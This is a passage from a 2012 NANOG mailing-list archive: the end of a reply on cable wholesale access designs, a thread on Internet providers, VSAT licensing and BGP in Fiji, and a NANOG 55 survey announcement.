Gotcha: don't know about Arris, but Cisco caps you at 16K pw per chassis which means this solution only provides moderate scaling. Also you have to somehow terminate all these pw (which are "xconnect"s in Cisco-speak). * L3 solution : change your customers to land on a dedicated bundle and VRF. Apply policy based routing to force-forward all the CPE traffic up a VLAN to you. If you want to be able to authenticate/count/shape then you probably need to terminate this traffic as IPoE (Use a dedicated BNG, or maybe you could try Cisco ISG). Cableco would provide the DHCP for the CM, you would provide the DHCP for the CPE. CMTS would insert CM MAC as option 82 so you know which CPE belongs to which CM/customer. * L3 solution : last option is to do what they proposed. I would probably still implement this with a dedicated bundle and VRF. But rather than having to land the sessions as IPoE, you can now have them come in as PPTP. This allows you to authenticate/count/shape via your LNS. Hope that helps, Michael. From eyeronic.design at gmail.com Tue Jul 31 19:39:19 2012 From: eyeronic.design at gmail.com (Mike Hale) Date: Tue, 31 Jul 2012 17:39:19 -0700 Subject: Fiji Islands In-Reply-To: References: <1343765681.21108.YahooMailNeo@web121701.mail.ne1.yahoo.com> Message-ID: It looks like Fintel and TFL are both providers for Southern Cross cable. That would be your best bet if they can get lines out to you. Otherwise, there's always VSAT, but that brings a set of other issues with it. Ping me offlist if you want more detail on the VSAT stuff. On Tue, Jul 31, 2012 at 4:55 PM, Franck Martin wrote: > In no particular order > > Connect.com.fj aka tfl.com.fj > Fintel.com.fj > Vodafone.com.fj (via a 3G stick) > Digicel.com.fj (via a 2G stick, but also via a wireless backbone network) > > If you want to do BGP or IPv6, good luck! > > Is that for Fiji Water? ;) > > These people have very good operational Internet experience in Fiji. 
> > http://www.linkedin.com/in/timothyverma > http://www.linkedin.com/pub/alfred-prasad/0/409/14a > http://au.linkedin.com/in/skeeve > > On 7/31/12 1:14 PM, "Philip Lavine" wrote: > >>Who offeres Internet Bandwidth in Fiji Islands (Lautoka and Yaqara)? > > -- 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0 From zaid at zaidali.com Tue Jul 31 19:58:18 2012 From: zaid at zaidali.com (Zaid Ali) Date: Tue, 31 Jul 2012 17:58:18 -0700 Subject: Fiji Islands In-Reply-To: References: <1343765681.21108.YahooMailNeo@web121701.mail.ne1.yahoo.com> Message-ID: Fintel and TFL sleep in the same bed essentially. Fintel is the gatekeeper of the southern cross cable protected heavily by the local government, your typical monopoly setup. Connect is a business unit of TFL. I think you can do the math there. Fintel does not do BGP out of the country (or didn't the last time I was there). Forget VSAT, waste of time. Zaid On Jul 31, 2012, at 5:39 PM, Mike Hale wrote: > It looks like Fintel and TFL are both providers for Southern Cross > cable. That would be your best bet if they can get lines out to you. > > Otherwise, there's always VSAT, but that brings a set of other issues with it. > > Ping me offlist if you want more detail on the VSAT stuff. > > On Tue, Jul 31, 2012 at 4:55 PM, Franck Martin wrote: >> In no particular order >> >> Connect.com.fj aka tfl.com.fj >> Fintel.com.fj >> Vodafone.com.fj (via a 3G stick) >> Digicel.com.fj (via a 2G stick, but also via a wireless backbone network) >> >> If you want to do BGP or IPv6, good luck! >> >> Is that for Fiji Water? ;) >> >> These people have very good operational Internet experience in Fiji. >> >> http://www.linkedin.com/in/timothyverma >> http://www.linkedin.com/pub/alfred-prasad/0/409/14a >> http://au.linkedin.com/in/skeeve >> >> On 7/31/12 1:14 PM, "Philip Lavine" wrote: >> >>> Who offeres Internet Bandwidth in Fiji Islands (Lautoka and Yaqara)? 
>> >> > > -- > 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0 > From eyeronic.design at gmail.com Tue Jul 31 20:05:17 2012 From: eyeronic.design at gmail.com (Mike Hale) Date: Tue, 31 Jul 2012 18:05:17 -0700 Subject: Fiji Islands In-Reply-To: References: <1343765681.21108.YahooMailNeo@web121701.mail.ne1.yahoo.com> Message-ID: VSAT *isn't* a waste of time if you're willing to spend the money. But that, of course, is the key point. Quality VSAT service costs a LOT of money (3k-5k per asymmetrical megabit). Plus, a quality provider will have no problem providing you with BGP. On Tue, Jul 31, 2012 at 5:58 PM, Zaid Ali wrote: > Fintel and TFL sleep in the same bed essentially. Fintel is the gatekeeper of the southern cross cable protected heavily by the local government, your typical monopoly setup. Connect is a business unit of TFL. I think you can do the math there. > > Fintel does not do BGP out of the country (or didn't the last time I was there). Forget VSAT, waste of time. > > Zaid > > On Jul 31, 2012, at 5:39 PM, Mike Hale wrote: > >> It looks like Fintel and TFL are both providers for Southern Cross >> cable. That would be your best bet if they can get lines out to you. >> >> Otherwise, there's always VSAT, but that brings a set of other issues with it. >> >> Ping me offlist if you want more detail on the VSAT stuff. >> >> On Tue, Jul 31, 2012 at 4:55 PM, Franck Martin wrote: >>> In no particular order >>> >>> Connect.com.fj aka tfl.com.fj >>> Fintel.com.fj >>> Vodafone.com.fj (via a 3G stick) >>> Digicel.com.fj (via a 2G stick, but also via a wireless backbone network) >>> >>> If you want to do BGP or IPv6, good luck! >>> >>> Is that for Fiji Water? ;) >>> >>> These people have very good operational Internet experience in Fiji. 
>>> >>> http://www.linkedin.com/in/timothyverma >>> http://www.linkedin.com/pub/alfred-prasad/0/409/14a >>> http://au.linkedin.com/in/skeeve >>> >>> On 7/31/12 1:14 PM, "Philip Lavine" wrote: >>> >>>> Who offeres Internet Bandwidth in Fiji Islands (Lautoka and Yaqara)? >>> >>> >> >> >> >> -- >> 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0 >> > -- 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0 From fmartin at linkedin.com Tue Jul 31 20:34:36 2012 From: fmartin at linkedin.com (Franck Martin) Date: Wed, 1 Aug 2012 01:34:36 +0000 Subject: Fiji Islands In-Reply-To: Message-ID: And you need a license to operate VSAT in Fiji (as well as to operate an ISP), which is near impossible to get on the mainland, as TFL can provide you the service you require. For SCC, FINTEL and TFL have direct access to SCC. Though last time I looked, TFL peering is not very good. FINTEL: http://bgp.he.net/AS9241 TFL: http://bgp.he.net/AS45349 And there is the University of the South Pacific which is not a provider of any Internet Service http://bgp.he.net/AS24390 The fun part of all of that, is that the interconnection of these 3 AS is done overseas? FAIL! On 7/31/12 6:05 PM, "Mike Hale" wrote: >VSAT *isn't* a waste of time if you're willing to spend the money. > >But that, of course, is the key point. Quality VSAT service costs a >LOT of money (3k-5k per asymmetrical megabit). Plus, a quality >provider will have no problem providing you with BGP. > >On Tue, Jul 31, 2012 at 5:58 PM, Zaid Ali wrote: >> Fintel and TFL sleep in the same bed essentially. Fintel is the >>gatekeeper of the southern cross cable protected heavily by the local >>government, your typical monopoly setup. Connect is a business unit of >>TFL. I think you can do the math there. >> >> Fintel does not do BGP out of the country (or didn't the last time I >>was there). Forget VSAT, waste of time. 
>> >> Zaid >> >> On Jul 31, 2012, at 5:39 PM, Mike Hale wrote: >> >>> It looks like Fintel and TFL are both providers for Southern Cross >>> cable. That would be your best bet if they can get lines out to you. >>> >>> Otherwise, there's always VSAT, but that brings a set of other issues >>>with it. >>> >>> Ping me offlist if you want more detail on the VSAT stuff. >>> >>> On Tue, Jul 31, 2012 at 4:55 PM, Franck Martin >>>wrote: >>>> In no particular order >>>> >>>> Connect.com.fj aka tfl.com.fj >>>> Fintel.com.fj >>>> Vodafone.com.fj (via a 3G stick) >>>> Digicel.com.fj (via a 2G stick, but also via a wireless backbone >>>>network) >>>> >>>> If you want to do BGP or IPv6, good luck! >>>> >>>> Is that for Fiji Water? ;) >>>> >>>> These people have very good operational Internet experience in Fiji. >>>> >>>> http://www.linkedin.com/in/timothyverma >>>> http://www.linkedin.com/pub/alfred-prasad/0/409/14a >>>> http://au.linkedin.com/in/skeeve >>>> >>>> On 7/31/12 1:14 PM, "Philip Lavine" wrote: >>>> >>>>> Who offeres Internet Bandwidth in Fiji Islands (Lautoka and Yaqara)? >>>> >>>> >>> >>> >>> >>> -- >>> 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0 >>> >> > > > >-- >09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0 From zaid at zaidali.com Tue Jul 31 20:37:41 2012 From: zaid at zaidali.com (Zaid Ali) Date: Tue, 31 Jul 2012 18:37:41 -0700 Subject: Fiji Islands In-Reply-To: References: <1343765681.21108.YahooMailNeo@web121701.mail.ne1.yahoo.com> Message-ID: <809547A0-4FD2-4CC3-9370-5F4E08B09003@zaidali.com> VSAT is resold by Telecom Fiji so you are not going to get anything different than the Telecom Fiji experience with the added bonus of very few folks using VSAT in the country and Telecom Fiji doing a poor job of operational support of VSAT. I considered VSAT 12 years ago for connecting the university medical network I built there but setting aside costs there was really no competence from Telecom Fiji to manage this service. 
If something breaks in the earth station a VSAT tech is flown from Australia and it can take weeks to fix anything.

My suggestion is to work with Connect folks and explore redundancy from either vodafone or digicel as Franck suggested. My experience there has been building networks in Suva, Lautoka, Nadi. Skeeve can give more advice for all the fun building in the resort Islands :)

Zaid

On Jul 31, 2012, at 6:05 PM, Mike Hale wrote:

> VSAT *isn't* a waste of time if you're willing to spend the money.
>
> But that, of course, is the key point. Quality VSAT service costs a
> LOT of money (3k-5k per asymmetrical megabit). Plus, a quality
> provider will have no problem providing you with BGP.
From eyeronic.design at gmail.com Tue Jul 31 20:58:20 2012
From: eyeronic.design at gmail.com (Mike Hale)
Date: Tue, 31 Jul 2012 18:58:20 -0700
Subject: Fiji Islands
In-Reply-To: <809547A0-4FD2-4CC3-9370-5F4E08B09003@zaidali.com>
References: <1343765681.21108.YahooMailNeo@web121701.mail.ne1.yahoo.com> <809547A0-4FD2-4CC3-9370-5F4E08B09003@zaidali.com>
Message-ID:

Zaid, Franck: Thanks for the clarification. I forgot to take into account politics.

I suppose it's impossible to obtain a VSAT license if you're transmitting to an out-of-country teleport?

The technical support side isn't that difficult if you've got reasonably intelligent people onsite along with spares of *everything*.

On Tue, Jul 31, 2012 at 6:37 PM, Zaid Ali wrote:
> VSAT is resold by Telecom Fiji so you are not going to get anything different than the Telecom Fiji experience with the added bonus of very few folks using VSAT in the country and Telecom Fiji doing a poor job of operational support of VSAT. I considered VSAT 12 years ago for connecting the university medical network I built there but setting aside costs there was really no competence from Telecom Fiji to manage this service. If something breaks in the earth station a VSAT tech is flown from Australia and it can take weeks to fix anything.
>
> My suggestion is to work with Connect folks and explore redundancy from either vodafone or digicel as Franck suggested. My experience there has been building networks in Suva, Lautoka, Nadi.
> Skeeve can give more advice for all the fun building in the resort Islands :)
>
> Zaid

--
09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0

From sylvie at newnog.org Tue Jul 31 21:41:25 2012
From: sylvie at newnog.org (Sylvie LaPerriere)
Date: Tue, 31 Jul 2012 22:41:25 -0400
Subject: [NANOG-announce] NANOG 55 Survey Highlights and Upcoming NANOG 56/ARIN XXX
Message-ID:

NANOG Colleagues, NANOG 55 Attendees,

We hope you are having a great Summer. We are already hard at work preparing for NANOG 56/ARIN XXX in Dallas. Take a moment now to register for the conference and book your hotel room at http://www.nanog.org/meetings/nanog56/nanog56_registration.html

We had 525 registrants in Vancouver last June and I want to share the survey highlights. The survey participation rate was 14%. We are thankful for your answers as knowing your preferences increases the likelihood of planning future 'awesome' events for you.

Highlights:

* Your top 3 reasons to attend NANOG are 1) network with colleagues 2) the agenda (program) quality and content 3) tutorials. Closely followed by 4) socials, 5) keynotes and 6) location.
* You rated the quality of our speakers, the quality of the technical information presented and the technical relevance of topics as either 'excellent' or 'very good'.
* You are generally not commenting about the NANOG conference on social media platforms during the event.
* 78% of attendees were able to successfully associate to the wireless network on their first attempt.
* You thought the Westin was great for its location, its setting and its amenities (nice to know for future picks!)
* You come to NANOG to meet new people, socially interact with colleagues and learn.
* You generally are not a subscriber to our mailing lists: nanog@, nanog-announce@, nanog-futures@

First-Time attendees enjoyed their NANOG experience and are hopeful that they will be able to return to future meetings.
Some are even planning to bring along colleagues.

Comments for speakers were really appreciated. We shared them with those presenting, thereby helping speakers with future presentations and communicating attendees' expectations with respect to presentation content and its delivery.

The Food & Beverage (F&B) comments were great. You are generally very pleased with the quality and the variety. We note that your level of satisfaction increases if you are continuously caffeinated or hydrated during the day and if offered plenty of beer/wine/spirits/sodas during the evenings. We took good note of your suggestions and look for them at NANOG 56. Special thanks for embracing (ie not complaining about) our 'green options': favouring large dispensers over individual plastic bottles or cans saves us lots of money and reduces our environmental footprint.

For the curious-minded, detailed results are posted at http://www.nanog.org/meetings/nanog55/surveys.html. Consider joining the mailing lists at http://www.nanog.org/mailinglist/

Thanks again to all who attended, presented, and sponsored our return trip to Canada with NANOG 55. It was a great experience and we will not wait another 5 years to return to Canada.

We look forward to seeing everyone again at NANOG 56/ARIN XXX!
Sincerely,
Sylvie

--
Sylvie LaPerriere
NANOG Board Chair - www.nanog.org

_______________________________________________
NANOG-announce mailing list
NANOG-announce at nanog.org
https://mailman.nanog.org/mailman/listinfo/nanog-announce

From fmartin at linkedin.com Tue Jul 31 21:45:35 2012
From: fmartin at linkedin.com (Franck Martin)
Date: Wed, 1 Aug 2012 02:45:35 +0000
Subject: Fiji Islands
In-Reply-To:
References: <1343765681.21108.YahooMailNeo@web121701.mail.ne1.yahoo.com> <809547A0-4FD2-4CC3-9370-5F4E08B09003@zaidali.com>
Message-ID: <9BF90809-0B41-4FE0-8F7D-978F25834AB2@linkedin.com>

It is not impossible but you have to prove the current providers cannot provide you the service. Some resorts in remote islands use VSAT.

To be noted O3B could be a solution too.

All knowledge is an answer to a question.

On Jul 31, 2012, at 6:58 PM, "Mike Hale" wrote:

> Zaid, Franck: Thanks for the clarification. I forgot to take into
> account politics.
>
> I suppose it's impossible to obtain a VSAT license if you're
> transmitting to an out-of-country teleport?
>
> The technical support side isn't that difficult if you've got
> reasonably intelligent people onsite along with spares of
> *everything*.